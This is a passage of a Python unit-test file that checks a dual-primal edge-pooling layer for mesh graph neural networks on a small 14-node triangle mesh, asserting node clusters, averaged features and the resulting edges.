for old_primal_node in range(num_primal_nodes):
if (old_primal_node in [0, 6, 7, 10, 11]):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 0)
elif (old_primal_node in [1, 5]):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 1)
elif (old_primal_node in [4, 13]):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 2)
elif (old_primal_node in [2, 3, 8]):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 3)
elif (old_primal_node == 9):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 4)
elif (old_primal_node == 12):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 5)
# - Check that the features of each new primal node correspond to the
# average of the features of the primal nodes merged together into
# that node.
for new_primal_node in range(num_new_primal_nodes):
old_primal_nodes_per_new_primal_node = [[0, 6, 7, 10, 11], [1, 5],
[4, 13], [2, 3, 8], 9, 12]
old_primal_nodes = old_primal_nodes_per_new_primal_node[
new_primal_node]
self.assertAlmostEqual(
new_primal_graph_batch.x[new_primal_node, 0].item(),
primal_graph_batch.x[old_primal_nodes, 0].mean().item(), 5)
# - Check the edges between the new primal nodes, which should be the
# following:
# - 0->1 / 1->0;
# - 0->4 / 4->0;
# - 0->5 / 5->0;
# - 1->2 / 2->1;
# - 1->3 / 3->1;
# - 2->3 / 3->2;
# - 2->5 / 5->2;
# - 3->4 / 4->3.
self.assertEqual(num_new_primal_edges, 16)
new_primal_edge_index_list = new_primal_graph_batch.edge_index.t(
).tolist()
for new_primal_edge in [[0, 1], [0, 4], [0, 5], [1, 2], [1, 3], [2, 3],
[2, 5], [3, 4]]:
self.assertTrue(new_primal_edge in new_primal_edge_index_list)
self.assertTrue(new_primal_edge[::-1] in new_primal_edge_index_list)
# Check that opposite primal edges are associated to the same dual
# node.
self.assertEqual(new_petdni_batch[tuple(new_primal_edge)],
new_petdni_batch[tuple(new_primal_edge[::-1])])
# Tests on the new dual graph.
num_new_dual_nodes = maybe_num_nodes(new_dual_graph_batch.edge_index)
num_new_dual_edges = new_dual_graph_batch.num_edges
self.assertEqual(num_new_dual_nodes, num_new_primal_edges // 2)
# - Check that in case the border between two new face clusters is made
# of multiple edges of the original mesh, the dual feature associated
# to the new primal edge is the average of the dual features
# associated with the 'multiple edges of the original mesh'. This
# happens between new primal nodes 0--1, 0--5, 2--3 and 3--4.
idx_new_dual_node = new_petdni_batch[(0, 1)]
idx_old_dual_node_1 = petdni_batch[(0, 1)]
idx_old_dual_node_2 = petdni_batch[(5, 6)]
self.assertAlmostEqual(
new_dual_graph_batch.x[idx_new_dual_node, 0].item(),
dual_graph_batch.x[[idx_old_dual_node_1, idx_old_dual_node_2],
0].mean().item(), 5)
idx_new_dual_node = new_petdni_batch[(0, 5)]
idx_old_dual_node_1 = petdni_batch[(6, 12)]
idx_old_dual_node_2 = petdni_batch[(11, 12)]
self.assertAlmostEqual(
new_dual_graph_batch.x[idx_new_dual_node, 0].item(),
dual_graph_batch.x[[idx_old_dual_node_1, idx_old_dual_node_2],
0].mean().item(), 5)
idx_new_dual_node = new_petdni_batch[(2, 3)]
idx_old_dual_node_1 = petdni_batch[(3, 4)]
idx_old_dual_node_2 = petdni_batch[(8, 13)]
self.assertAlmostEqual(
new_dual_graph_batch.x[idx_new_dual_node, 0].item(),
dual_graph_batch.x[[idx_old_dual_node_1, idx_old_dual_node_2],
0].mean().item(), 5)
idx_new_dual_node = new_petdni_batch[(3, 4)]
idx_old_dual_node_1 = petdni_batch[(2, 9)]
idx_old_dual_node_2 = petdni_batch[(8, 9)]
self.assertAlmostEqual(
new_dual_graph_batch.x[idx_new_dual_node, 0].item(),
dual_graph_batch.x[[idx_old_dual_node_1, idx_old_dual_node_2],
0].mean().item(), 5)
# - For all other cases, check that the dual feature associated to the
# new primal edge is the dual feature associated with edge of the
# original mesh that is now between the new primal nodes.
new_dual_nodes = [(0, 4), (1, 2), (1, 3), (2, 5)]
old_dual_nodes = [(9, 10), (4, 5), (1, 2), (12, 13)]
for new_dual_node, old_dual_node in zip(new_dual_nodes, old_dual_nodes):
idx_new_dual_node = new_petdni_batch[new_dual_node]
idx_old_dual_node = petdni_batch[old_dual_node]
self.assertAlmostEqual(
new_dual_graph_batch.x[idx_new_dual_node, 0].item(),
dual_graph_batch.x[idx_old_dual_node, 0].item(), 5)
# - Check that the mapping between old and new dual nodes is correct.
old_dual_node_to_new_one = pooling_log.old_dual_node_to_new_one
self.assertEqual(len(old_dual_node_to_new_one), num_dual_nodes)
old_dual_nodes_index_with_corresponding_new_one = [
petdni_batch[primal_edge]
for primal_edge in [(0, 1), (1, 2), (2, 9), (3, 4), (4, 5), (
5, 6), (6, 12), (8, 9), (8, 13), (9, 10), (11, 12), (12, 13)]
]
corresponding_new_dual_nodes = [
new_petdni_batch[primal_edge]
for primal_edge in [(0, 1), (1, 3), (3, 4), (2, 3), (1, 2), (
0, 1), (0, 5), (3, 4), (2, 3), (0, 4), (0, 5), (2, 5)]
]
for dual_node_idx in range(num_dual_nodes):
if (dual_node_idx in old_dual_nodes_index_with_corresponding_new_one
):
# - The old dual node has a corresponding new dual node.
self.assertEqual(
old_dual_node_to_new_one[dual_node_idx],
corresponding_new_dual_nodes[
old_dual_nodes_index_with_corresponding_new_one.index(
dual_node_idx)])
else:
# - The old dual node has no corresponding new dual node.
self.assertEqual(old_dual_node_to_new_one[dual_node_idx], -1)
# - Check the edges between the new dual nodes, which should be the
# following (with dual nodes indicated by the corresponding primal
# nodes as a set):
# - {0, 1} -> {0, 4};
# - {0, 1} -> {0, 5};
# - {0, 1} -> {1, 2};
# - {0, 1} -> {1, 3};
# - {0, 4} -> {0, 1};
# - {0, 4} -> {0, 5};
# - {0, 4} -> {3, 4};
# - {0, 5} -> {0, 1};
# - {0, 5} -> {0, 4};
# - {0, 5} -> {2, 5};
# - {1, 2} -> {0, 1};
# - {1, 2} -> {1, 3};
# - {1, 2} -> {2, 3};
# - {1, 2} -> {2, 5};
# - {1, 3} -> {0, 1};
# - {1, 3} -> {1, 2};
# - {1, 3} -> {2, 3};
# - {1, 3} -> {3, 4};
# - {2, 3} -> {1, 2};
# - {2, 3} -> {2, 5};
# - {2, 3} -> {1, 3};
# - {2, 3} -> {3, 4};
# - {2, 5} -> {1, 2};
# - {2, 5} -> {2, 3};
# - {2, 5} -> {0, 5};
# - {3, 4} -> {1, 3};
# - {3, 4} -> {2, 3};
# - {3, 4} -> {0, 4}.
self.assertEqual(num_new_dual_edges, 28)
new_dual_edge_index_list = new_dual_graph_batch.edge_index.t().tolist()
dual_node_1 = (0, 1)
other_dual_nodes = [(0, 4), (0, 5), (1, 2), (1, 3)]
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[dual_node_1], new_petdni_batch[other_dual_node]
] in new_dual_edge_index_list)
dual_node_1 = (0, 4)
other_dual_nodes = [(0, 1), (0, 5), (3, 4)]
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[dual_node_1], new_petdni_batch[other_dual_node]
] in new_dual_edge_index_list)
dual_node_1 = (0, 5)
other_dual_nodes = [(0, 1), (0, 4), (2, 5)]
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[dual_node_1], new_petdni_batch[other_dual_node]
] in new_dual_edge_index_list)
dual_node_1 = (1, 2)
other_dual_nodes = [(0, 1), (1, 3), (2, 3), (2, 5)]
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[dual_node_1], new_petdni_batch[other_dual_node]
] in new_dual_edge_index_list)
dual_node_1 = (1, 3)
other_dual_nodes = [(0, 1), (1, 2), (2, 3), (3, 4)]
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[dual_node_1], new_petdni_batch[other_dual_node]
] in new_dual_edge_index_list)
dual_node_1 = (2, 3)
other_dual_nodes = [(1, 2), (2, 5), (1, 3), (3, 4)]
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[dual_node_1], new_petdni_batch[other_dual_node]
] in new_dual_edge_index_list)
dual_node_1 = (2, 5)
other_dual_nodes = [(1, 2), (2, 3), (0, 5)]
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[dual_node_1], new_petdni_batch[other_dual_node]
] in new_dual_edge_index_list)
dual_node_1 = (3, 4)
other_dual_nodes = [(1, 3), (2, 3), (0, 4)]
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[dual_node_1], new_petdni_batch[other_dual_node]
] in new_dual_edge_index_list)
def __test_large_simple_mesh_config_A_with_output_self_loops(
self,
num_primal_edges_to_keep=None,
fraction_primal_edges_to_keep=None,
primal_att_coeff_threshold=None,
use_decreasing_attention_coefficient=True,
num_heads=1):
# - Dual-graph configuration A.
single_dual_nodes = True
undirected_dual_edges = True
graph_creator = create_graphs.GraphCreator(
mesh_filename=osp.join(current_dir,
'../../common_data/simple_mesh_large.ply'),
single_dual_nodes=single_dual_nodes,
undirected_dual_edges=undirected_dual_edges,
primal_features_from_dual_features=False)
primal_graph, dual_graph = graph_creator.create_graphs()
petdni = graph_creator.primal_edge_to_dual_node_idx
(primal_graph_batch, dual_graph_batch,
petdni_batch) = create_dual_primal_batch(
primal_graphs_list=[primal_graph],
dual_graphs_list=[dual_graph],
primal_edge_to_dual_node_idx_list=[petdni])
# Primal graph.
num_primal_edges = primal_graph_batch.num_edges
num_primal_nodes = maybe_num_nodes(primal_graph_batch.edge_index)
self.assertEqual(num_primal_edges, 42)
self.assertEqual(num_primal_nodes, 14)
# - Check existence of primal edges.
for edge in [(0, 1), (0, 7), (0, 10), (1, 2), (1, 5), (2, 3), (2, 9),
(3, 4), (3, 8), (4, 5), (4, 13), (5, 6), (6, 7), (6, 12),
(7, 11), (8, 9), (8, 13), (9, 10), (10, 11), (11, 12),
(12, 13)]:
self.assertEqual(petdni_batch[edge], petdni_batch[edge[::-1]])
# - Set the features of each primal node randomly.
dim_primal_features = primal_graph_batch.num_node_features
for primal_feature in primal_graph_batch.x:
primal_feature[:] = torch.rand(dim_primal_features,
dtype=torch.float)
# Dual graph.
num_dual_edges = dual_graph_batch.num_edges
num_dual_nodes = maybe_num_nodes(dual_graph_batch.edge_index)
# - Since the mesh is watertight, the medial graph of the triangulation
# is 4-regular, hence each node in the dual graph has 4 incoming edges
# and 4 outgoing edges. However, since there are no self-loops in the
# dual graph, each incoming edge for a certain dual node is also an
# outgoing edge for another dual node, and the total number of
# (directed) edges in the dual graph is 4 times the number of dual
# nodes.
self.assertEqual(num_dual_edges, num_dual_nodes * 4)
self.assertEqual(num_dual_nodes, num_primal_edges // 2)
# - Set the features of each dual node randomly.
dim_dual_features = dual_graph_batch.num_node_features
for dual_feature in dual_graph_batch.x:
dual_feature[:] = torch.rand(dim_dual_features,
dtype=torch.float) * 3
# Randomly shuffle the primal edge-index matrix.
permutation = np.random.permutation(num_primal_edges)
primal_graph_batch.edge_index = (
primal_graph_batch.edge_index[:, permutation])
# Set the attention coefficients manually, so as to pool the following
# primal edges:
# - 0->10 / 10->0;
# - 6->7 / 7->6;
# - 7->11 / 11->7;
# - 10->11 / 11->10;
# - 1->5 / 5->1;
# - 2->3 / 3->2;
# - 3->8 / 8->3;
# - 4->13 / 13->4.
# (cf. file `../../common_data/simple_mesh_large_pool_1.png`)
if (primal_att_coeff_threshold is not None):
attention_threshold = primal_att_coeff_threshold
else:
attention_threshold = 0.5
primal_attention_coeffs = torch.rand(
[num_primal_edges, num_heads],
dtype=torch.float) * attention_threshold
if (use_decreasing_attention_coefficient):
for edge_idx, primal_edge in enumerate(
primal_graph_batch.edge_index.t().tolist()):
if (sorted(primal_edge) in [[0, 10], [6, 7], [7, 11], [10, 11],
[1, 5], [2, 3], [3, 8], [4, 13]]):
primal_attention_coeffs[edge_idx] += (1 -
attention_threshold)
elif (primal_edge == [1, 2]):
# Further test: set \alpha_{2, 1} = 0.7 > 0.5, but
# \alpha_{1, 2} = 0.2, so that
# (\alpha_{1, 2} + \alpha_{2, 1}) / 2 = 0.45 < 0.5, and the
# edges 1->2 / 2->1 do not get pooled.
primal_attention_coeffs[edge_idx] = 0.2
elif (primal_edge == [2, 1]):
primal_attention_coeffs[edge_idx] = 0.7
else:
for edge_idx, primal_edge in enumerate(
primal_graph_batch.edge_index.t().tolist()):
if (sorted(primal_edge) not in [[0, 10], [6, 7], [7, 11],
[10, 11], [1, 5], [2, 3],
[3, 8], [4, 13], [1, 2]]):
primal_attention_coeffs[edge_idx] += (1 -
attention_threshold)
elif (primal_edge == [1, 2]):
# Further test: set \alpha_{1, 2} = 0.4 < 0.5, but
# \alpha_{2, 1} = 0.7, so that
# (\alpha_{1, 2} + \alpha_{2, 1}) / 2 = 0.55 > 0.5, and the
# edges 1->2 / 2->1 do not get pooled.
primal_attention_coeffs[edge_idx] = 0.4
elif (primal_edge == [2, 1]):
primal_attention_coeffs[edge_idx] = 0.7
# Create a single dual-primal edge-pooling layer.
pool = DualPrimalEdgePooling(
self_loops_in_output_dual_graph=True,
single_dual_nodes=single_dual_nodes,
undirected_dual_edges=undirected_dual_edges,
num_primal_edges_to_keep=num_primal_edges_to_keep,
fraction_primal_edges_to_keep=fraction_primal_edges_to_keep,
primal_att_coeff_threshold=primal_att_coeff_threshold,
use_decreasing_attention_coefficient=
use_decreasing_attention_coefficient,
return_old_dual_node_to_new_dual_node=True)
# Perform primal-edge pooling.
(new_primal_graph_batch, new_dual_graph_batch, new_petdni_batch,
pooling_log) = pool(primal_graph_batch=primal_graph_batch,
dual_graph_batch=dual_graph_batch,
primal_edge_to_dual_node_idx_batch=petdni_batch,
primal_attention_coeffs=primal_attention_coeffs)
# Tests on the new primal graph.
num_new_primal_nodes = maybe_num_nodes(
new_primal_graph_batch.edge_index)
num_new_primal_edges = new_primal_graph_batch.num_edges
self.assertEqual(num_new_primal_nodes, 6)
# - Check correspondence of the old primal nodes with the new primal
# nodes (i.e., node clusters).
old_primal_node_to_new_one = pooling_log.old_primal_node_to_new_one
for old_primal_node in range(num_primal_nodes):
if (old_primal_node in [0, 6, 7, 10, 11]):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 0)
elif (old_primal_node in [1, 5]):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 1)
elif (old_primal_node in [4, 13]):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 2)
elif (old_primal_node in [2, 3, 8]):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 3)
elif (old_primal_node == 9):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 4)
elif (old_primal_node == 12):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 5)
# - Check that the features of each new primal node correspond to the
# average of the features of the primal nodes merged together into
# that node.
for new_primal_node in range(num_new_primal_nodes):
old_primal_nodes_per_new_primal_node = [[0, 6, 7, 10, 11], [1, 5],
[4, 13], [2, 3, 8], 9, 12]
old_primal_nodes = old_primal_nodes_per_new_primal_node[
new_primal_node]
self.assertAlmostEqual(
new_primal_graph_batch.x[new_primal_node, 0].item(),
primal_graph_batch.x[old_primal_nodes, 0].mean().item(), 5)
# - Check the edges between the new primal nodes, which should be the
# following:
# - 0->1 / 1->0;
# - 0->4 / 4->0;
# - 0->5 / 5->0;
# - 1->2 / 2->1;
# - 1->3 / 3->1;
# - 2->3 / 3->2;
# - 2->5 / 5->2;
# - 3->4 / 4->3.
self.assertEqual(num_new_primal_edges, 16)
new_primal_edge_index_list = new_primal_graph_batch.edge_index.t(
).tolist()
for new_primal_edge in [[0, 1], [0, 4], [0, 5], [1, 2], [1, 3], [2, 3],
[2, 5], [3, 4]]:
self.assertTrue(new_primal_edge in new_primal_edge_index_list)
self.assertTrue(new_primal_edge[::-1] in new_primal_edge_index_list)
# Check that opposite primal edges are associated to the same dual
# node.
self.assertEqual(new_petdni_batch[tuple(new_primal_edge)],
new_petdni_batch[tuple(new_primal_edge[::-1])])
# Tests on the new dual graph.
num_new_dual_nodes = maybe_num_nodes(new_dual_graph_batch.edge_index)
num_new_dual_edges = new_dual_graph_batch.num_edges
self.assertEqual(num_new_dual_nodes, num_new_primal_edges // 2)
# - Check that in case the border between two new face clusters is made
# of multiple edges of the original mesh, the dual feature associated
# to the new primal edge is the average of the dual features
# associated with the 'multiple edges of the original mesh'. This
# happens between new primal nodes 0--1, 0--5, 2--3 and 3--4.
idx_new_dual_node = new_petdni_batch[(0, 1)]
idx_old_dual_node_1 = petdni_batch[(0, 1)]
idx_old_dual_node_2 = petdni_batch[(5, 6)]
self.assertAlmostEqual(
new_dual_graph_batch.x[idx_new_dual_node, 0].item(),
dual_graph_batch.x[[idx_old_dual_node_1, idx_old_dual_node_2],
0].mean().item(), 5)
idx_new_dual_node = new_petdni_batch[(0, 5)]
idx_old_dual_node_1 = petdni_batch[(6, 12)]
idx_old_dual_node_2 = petdni_batch[(11, 12)]
self.assertAlmostEqual(
new_dual_graph_batch.x[idx_new_dual_node, 0].item(),
dual_graph_batch.x[[idx_old_dual_node_1, idx_old_dual_node_2],
0].mean().item(), 5)
idx_new_dual_node = new_petdni_batch[(2, 3)]
idx_old_dual_node_1 = petdni_batch[(3, 4)]
idx_old_dual_node_2 = petdni_batch[(8, 13)]
self.assertAlmostEqual(
new_dual_graph_batch.x[idx_new_dual_node, 0].item(),
dual_graph_batch.x[[idx_old_dual_node_1, idx_old_dual_node_2],
0].mean().item(), 5)
idx_new_dual_node = new_petdni_batch[(3, 4)]
idx_old_dual_node_1 = petdni_batch[(2, 9)]
idx_old_dual_node_2 = petdni_batch[(8, 9)]
self.assertAlmostEqual(
new_dual_graph_batch.x[idx_new_dual_node, 0].item(),
dual_graph_batch.x[[idx_old_dual_node_1, idx_old_dual_node_2],
0].mean().item(), 5)
# - For all other cases, check that the dual feature associated to the
# new primal edge is the dual feature associated with edge of the
# original mesh that is now between the new primal nodes.
new_dual_nodes = [(0, 4), (1, 2), (1, 3), (2, 5)]
old_dual_nodes = [(9, 10), (4, 5), (1, 2), (12, 13)]
for new_dual_node, old_dual_node in zip(new_dual_nodes, old_dual_nodes):
idx_new_dual_node = new_petdni_batch[new_dual_node]
idx_old_dual_node = petdni_batch[old_dual_node]
self.assertAlmostEqual(
new_dual_graph_batch.x[idx_new_dual_node, 0].item(),
dual_graph_batch.x[idx_old_dual_node, 0].item(), 5)
# - Check that the mapping between old and new dual nodes is correct.
old_dual_node_to_new_one = pooling_log.old_dual_node_to_new_one
self.assertEqual(len(old_dual_node_to_new_one), num_dual_nodes)
old_dual_nodes_index_with_corresponding_new_one = [
petdni_batch[primal_edge]
for primal_edge in [(0, 1), (1, 2), (2, 9), (3, 4), (4, 5), (
5, 6), (6, 12), (8, 9), (8, 13), (9, 10), (11, 12), (12, 13)]
]
corresponding_new_dual_nodes = [
new_petdni_batch[primal_edge]
for primal_edge in [(0, 1), (1, 3), (3, 4), (2, 3), (1, 2), (
0, 1), (0, 5), (3, 4), (2, 3), (0, 4), (0, 5), (2, 5)]
]
for dual_node_idx in range(num_dual_nodes):
if (dual_node_idx in old_dual_nodes_index_with_corresponding_new_one
):
# - The old dual node has a corresponding new dual node.
self.assertEqual(
old_dual_node_to_new_one[dual_node_idx],
corresponding_new_dual_nodes[
old_dual_nodes_index_with_corresponding_new_one.index(
dual_node_idx)])
else:
# - The old dual node has no corresponding new dual node.
self.assertEqual(old_dual_node_to_new_one[dual_node_idx], -1)
# - Check the edges between the new dual nodes, which should be the
# following (with dual nodes indicated by the corresponding primal
# nodes as a set), plus the self-loops:
# - {0, 1} -> {0, 4};
# - {0, 1} -> {0, 5};
# - {0, 1} -> {1, 2};
# - {0, 1} -> {1, 3};
# - {0, 4} -> {0, 1};
# - {0, 4} -> {0, 5};
# - {0, 4} -> {3, 4};
# - {0, 5} -> {0, 1};
# - {0, 5} -> {0, 4};
# - {0, 5} -> {2, 5};
# - {1, 2} -> {0, 1};
# - {1, 2} -> {1, 3};
# - {1, 2} -> {2, 3};
# - {1, 2} -> {2, 5};
# - {1, 3} -> {0, 1};
# - {1, 3} -> {1, 2};
# - {1, 3} -> {2, 3};
# - {1, 3} -> {3, 4};
# - {2, 3} -> {1, 2};
# - {2, 3} -> {2, 5};
# - {2, 3} -> {1, 3};
# - {2, 3} -> {3, 4};
# - {2, 5} -> {1, 2};
# - {2, 5} -> {2, 3};
# - {2, 5} -> {0, 5};
# - {3, 4} -> {1, 3};
# - {3, 4} -> {2, 3};
# - {3, 4} -> {0, 4}.
self.assertEqual(num_new_dual_edges, 28 + num_new_dual_nodes)
new_dual_edge_index_list = new_dual_graph_batch.edge_index.t().tolist()
dual_node_1 = (0, 1)
other_dual_nodes = [(0, 4), (0, 5), (1, 2), (1, 3)]
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[dual_node_1], new_petdni_batch[other_dual_node]
] in new_dual_edge_index_list)
# Self-loop.
self.assertTrue(
[new_petdni_batch[dual_node_1], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
dual_node_1 = (0, 4)
other_dual_nodes = [(0, 1), (0, 5), (3, 4)]
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[dual_node_1], new_petdni_batch[other_dual_node]
] in new_dual_edge_index_list)
# Self-loop.
self.assertTrue(
[new_petdni_batch[dual_node_1], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
dual_node_1 = (0, 5)
other_dual_nodes = [(0, 1), (0, 4), (2, 5)]
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[dual_node_1], new_petdni_batch[other_dual_node]
] in new_dual_edge_index_list)
# Self-loop.
self.assertTrue(
[new_petdni_batch[dual_node_1], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
dual_node_1 = (1, 2)
other_dual_nodes = [(0, 1), (1, 3), (2, 3), (2, 5)]
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[dual_node_1], new_petdni_batch[other_dual_node]
] in new_dual_edge_index_list)
# Self-loop.
self.assertTrue(
[new_petdni_batch[dual_node_1], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
dual_node_1 = (1, 3)
other_dual_nodes = [(0, 1), (1, 2), (2, 3), (3, 4)]
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[dual_node_1], new_petdni_batch[other_dual_node]
] in new_dual_edge_index_list)
# Self-loop.
self.assertTrue(
[new_petdni_batch[dual_node_1], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
dual_node_1 = (2, 3)
other_dual_nodes = [(1, 2), (2, 5), (1, 3), (3, 4)]
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[dual_node_1], new_petdni_batch[other_dual_node]
] in new_dual_edge_index_list)
# Self-loop.
self.assertTrue(
[new_petdni_batch[dual_node_1], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
dual_node_1 = (2, 5)
other_dual_nodes = [(1, 2), (2, 3), (0, 5)]
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[dual_node_1], new_petdni_batch[other_dual_node]
] in new_dual_edge_index_list)
# Self-loop.
self.assertTrue(
[new_petdni_batch[dual_node_1], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
dual_node_1 = (3, 4)
other_dual_nodes = [(1, 3), (2, 3), (0, 4)]
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[dual_node_1], new_petdni_batch[other_dual_node]
] in new_dual_edge_index_list)
# Self-loop.
self.assertTrue(
[new_petdni_batch[dual_node_1], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
def __test_large_simple_mesh_config_B_with_output_self_loops(
self,
num_primal_edges_to_keep=None,
fraction_primal_edges_to_keep=None,
primal_att_coeff_threshold=None,
use_decreasing_attention_coefficient=True,
num_heads=1):
# - Dual-graph configuration B.
single_dual_nodes = False
undirected_dual_edges = True
graph_creator = create_graphs.GraphCreator(
mesh_filename=osp.join(current_dir,
'../../common_data/simple_mesh_large.ply'),
single_dual_nodes=single_dual_nodes,
undirected_dual_edges=undirected_dual_edges,
primal_features_from_dual_features=False)
primal_graph, dual_graph = graph_creator.create_graphs()
petdni = graph_creator.primal_edge_to_dual_node_idx
(primal_graph_batch, dual_graph_batch,
petdni_batch) = create_dual_primal_batch(
primal_graphs_list=[primal_graph],
dual_graphs_list=[dual_graph],
primal_edge_to_dual_node_idx_list=[petdni])
# Primal graph.
num_primal_edges = primal_graph_batch.num_edges
num_primal_nodes = maybe_num_nodes(primal_graph_batch.edge_index)
self.assertEqual(num_primal_edges, 42)
self.assertEqual(num_primal_nodes, 14)
# - Check existence of primal edges.
for edge in [(0, 1), (0, 7), (0, 10), (1, 2), (1, 5), (2, 3), (2, 9),
(3, 4), (3, 8), (4, 5), (4, 13), (5, 6), (6, 7), (6, 12),
(7, 11), (8, 9), (8, 13), (9, 10), (10, 11), (11, 12),
(12, 13)]:
# Configuration B has double dual nodes.
self.assertNotEqual(petdni_batch[edge], petdni_batch[edge[::-1]])
# - Set the features of each primal node randomly.
dim_primal_features = primal_graph_batch.num_node_features
for primal_feature in primal_graph_batch.x:
primal_feature[:] = torch.rand(dim_primal_features,
dtype=torch.float)
# Dual graph.
num_dual_edges = dual_graph_batch.num_edges
num_dual_nodes = maybe_num_nodes(dual_graph_batch.edge_index)
# - Since the mesh is watertight, the medial graph of the triangulation
# is 4-regular, hence each node in the dual graph has 4 incoming edges
# and 4 outgoing edges. However, since there are no self-loops in the
# dual graph, each incoming edge for a certain dual node is also an
# outgoing edge for another dual node, and the total number of
# (directed) edges in the dual graph is 4 times the number of dual
# nodes.
self.assertEqual(num_dual_edges, num_dual_nodes * 4)
self.assertEqual(num_dual_nodes, num_primal_edges)
# - Set the features of each dual node randomly.
dim_dual_features = dual_graph_batch.num_node_features
for dual_feature in dual_graph_batch.x:
dual_feature[:] = torch.rand(dim_dual_features,
dtype=torch.float) * 3
# Randomly shuffle the primal edge-index matrix.
permutation = np.random.permutation(num_primal_edges)
primal_graph_batch.edge_index = (
primal_graph_batch.edge_index[:, permutation])
# Set the attention coefficients manually, so as to pool the following
# primal edges:
# - 0->10 / 10->0;
# - 6->7 / 7->6;
# - 7->11 / 11->7;
# - 10->11 / 11->10;
# - 1->5 / 5->1;
# - 2->3 / 3->2;
# - 3->8 / 8->3;
# - 4->13 / 13->4.
# (cf. file `../../common_data/simple_mesh_large_pool_1.png`)
if (primal_att_coeff_threshold is not None):
attention_threshold = primal_att_coeff_threshold
else:
attention_threshold = 0.5
primal_attention_coeffs = torch.rand(
[num_primal_edges, num_heads],
dtype=torch.float) * attention_threshold
if (use_decreasing_attention_coefficient):
for edge_idx, primal_edge in enumerate(
primal_graph_batch.edge_index.t().tolist()):
if (sorted(primal_edge) in [[0, 10], [6, 7], [7, 11], [10, 11],
[1, 5], [2, 3], [3, 8], [4, 13]]):
primal_attention_coeffs[edge_idx] += (1 -
attention_threshold)
elif (primal_edge == [1, 2]):
# Further test: set \alpha_{2, 1} = 0.7 > 0.5, but
# \alpha_{1, 2} = 0.2, so that
# (\alpha_{1, 2} + \alpha_{2, 1}) / 2 = 0.45 < 0.5, and the
# edges 1->2 / 2->1 do not get pooled.
primal_attention_coeffs[edge_idx] = 0.2
elif (primal_edge == [2, 1]):
primal_attention_coeffs[edge_idx] = 0.7
else:
for edge_idx, primal_edge in enumerate(
primal_graph_batch.edge_index.t().tolist()):
if (sorted(primal_edge) not in [[0, 10], [6, 7], [7, 11],
[10, 11], [1, 5], [2, 3],
[3, 8], [4, 13], [1, 2]]):
primal_attention_coeffs[edge_idx] += (1 -
attention_threshold)
elif (primal_edge == [1, 2]):
# Further test: set \alpha_{1, 2} = 0.4 < 0.5, but
# \alpha_{2, 1} = 0.7, so that
# (\alpha_{1, 2} + \alpha_{2, 1}) / 2 = 0.55 > 0.5, and the
# edges 1->2 / 2->1 do not get pooled.
primal_attention_coeffs[edge_idx] = 0.4
elif (primal_edge == [2, 1]):
primal_attention_coeffs[edge_idx] = 0.7
# Create a single dual-primal edge-pooling layer.
pool = DualPrimalEdgePooling(
self_loops_in_output_dual_graph=True,
single_dual_nodes=single_dual_nodes,
undirected_dual_edges=undirected_dual_edges,
num_primal_edges_to_keep=num_primal_edges_to_keep,
fraction_primal_edges_to_keep=fraction_primal_edges_to_keep,
primal_att_coeff_threshold=primal_att_coeff_threshold,
use_decreasing_attention_coefficient=
use_decreasing_attention_coefficient,
return_old_dual_node_to_new_dual_node=True)
# Perform primal-edge pooling.
(new_primal_graph_batch, new_dual_graph_batch, new_petdni_batch,
pooling_log) = pool(primal_graph_batch=primal_graph_batch,
dual_graph_batch=dual_graph_batch,
primal_edge_to_dual_node_idx_batch=petdni_batch,
primal_attention_coeffs=primal_attention_coeffs)
# Tests on the new primal graph.
num_new_primal_nodes = maybe_num_nodes(
new_primal_graph_batch.edge_index)
num_new_primal_edges = new_primal_graph_batch.num_edges
self.assertEqual(num_new_primal_nodes, 6)
# - Check correspondence of the old primal nodes with the new primal
# nodes (i.e., node clusters).
old_primal_node_to_new_one = pooling_log.old_primal_node_to_new_one
for old_primal_node in range(num_primal_nodes):
if (old_primal_node in [0, 6, 7, 10, 11]):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 0)
elif (old_primal_node in [1, 5]):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 1)
elif (old_primal_node in [4, 13]):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 2)
elif (old_primal_node in [2, 3, 8]):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 3)
elif (old_primal_node == 9):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 4)
elif (old_primal_node == 12):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 5)
# - Check that the features of each new primal node correspond to the
